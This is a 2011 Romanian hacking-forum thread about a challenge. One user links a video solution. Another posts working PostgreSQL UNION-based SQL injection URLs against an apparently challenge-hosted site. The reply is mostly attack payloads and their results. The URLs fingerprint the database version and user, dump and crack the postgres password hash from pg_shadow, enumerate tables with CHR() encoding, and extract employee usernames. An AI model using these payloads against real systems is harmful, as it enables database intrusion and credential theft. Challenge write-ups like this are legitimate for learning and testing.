totti93 Posted December 24, 2011 Report Posted December 24, 2011 Rezolvarea mea la acest challenge:http://rstcenter.com/forum/45281-sql-injection-control-remote-system-game-over.rst 1 Quote
denjacker Posted December 24, 2011 Report Posted December 24, 2011 Felicitari si 10x ptr video. Mi-a placut modul in care ai rezolvat cerintele.Din pacate eu nu am avut destul timp sa duc pana la capat rezolvarea; oricum eu ma gandeam la o alta abordare la momentul respectiv.Cam asta e tot ce reusisem atunci...[*]SQL Injection POC:--------------------------n0net.dyndns.org/index2.php?userid=1+union+select+null,11111111111111111111::varchar--+--an0net.dyndns.org/index2.php?userid=1+union+select+null,cast(1111111111+as+text)--+--a[*]VERSIUNE : PostgreSQL 8.4.8 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit [*]USER : postgres http://n0net.dyndns.org/index2.php?userid=1+union+select+null,usename::varchar||chr%2858%29||passwd::varchar+from%20+pg_shadow--+--a postgres :::: 0cfe8da07c510ab414c7da9b1acc8fbd ==> hellopostgres[*]DATABASE : project [*]TABLES ==> COLUMNShttp://n0net.dyndns.org/index2.php?userid=1+union+select+null,table_name::varchar+from+information_schema.tables+where+table_schema=current_schema()+limit+1+offset+2--+--ahttp://n0net.dyndns.org/index2.php?userid=1+union+select+null,column_name::varchar+from++information_schema.columns+where+table_name=CHR(101)||CHR(109)||CHR(112)||CHR(108)||CHR(111)||CHR(121)||CHR(101)||CHR(101)+limit+1+offset+2+--+--aemployee ==> id, username,n0net.dyndns.org/index2.php?userid=1+union+select+null,id||chr(58)||username+from+employee +limit+1+offset+0--+--a2:tdxev 6:troll 7:admin 4:flubber 8:manager 3:pyth0n3 5:lammer Quote
